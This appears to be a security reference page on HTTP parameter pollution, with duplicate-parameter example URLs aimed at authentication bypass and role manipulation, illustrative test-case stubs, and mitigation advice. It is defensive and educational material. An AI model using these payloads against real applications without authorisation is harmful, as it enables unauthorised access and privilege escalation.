# Parameter Pollution

#### Description

Parameter Pollution occurs when an application processes multiple parameters with the same name, potentially leading to unexpected behavior or security vulnerabilities.

#### Example with Scenario

**Scenario:** A web application processes query parameters for user authentication. An attacker can craft a URL with duplicate parameters to bypass authentication or manipulate application behavior.

#### Payloads and Test Cases

**Payloads**

1. **Bypassing Authentication:**

   ```
   /login?user=admin&user=attacker
   ```
2. **Manipulating Values:**

   ```
   /order?item=book&item=laptop
   ```
3. **Changing Logic:**

   ```
   /action?role=admin&role=user
   ```

**Test Cases**

1. **Bypassing Authentication:**
   * **Payload:**

     ```
     /login?user=admin&user=attacker
     ```
   * **Test Case:**

     ```python
     # Send payload to the server
     sendPayloadToServer("/login?user=admin&user=attacker")
     # Verify if the application logs in as admin
     checkAuthentication("admin")
     ```
2. **Manipulating Values:**
   * **Payload:**

     ```
     /order?item=book&item=laptop
     ```
   * **Test Case:**

     ```python
     # Send payload to the server
     sendPayloadToServer("/order?item=book&item=laptop")
     # Verify if the application processes both items
     checkOrderItems(["book", "laptop"])
     ```
3. **Changing Logic:**
   * **Payload:**

     ```
     /action?role=admin&role=user
     ```
   * **Test Case:**

     ```python
     # Send payload to the server
     sendPayloadToServer("/action?role=admin&role=user")
     # Verify if the application processes the first or last role
     checkRoleProcessing(["admin", "user"])
     ```

#### Mitigation

1. **Parameter Validation:**
   * Validate parameters to ensure they are unique and meet expected criteria.
   * Reject requests with duplicate parameters.
2. **Use a Single Parameter Source:**
   * Use a single source of parameters (e.g., query string, POST body) to avoid confusion.
   * Avoid mixing parameters from different sources.
3. **Sanitize Input:**
   * Sanitize and normalize parameter input to prevent unexpected behavior.
   * Implement strict parameter parsing and validation.
4. **Framework Protections:**
   * Use frameworks and libraries that automatically handle parameter pollution.
   * Enable built-in protections against parameter pollution vulnerabilities.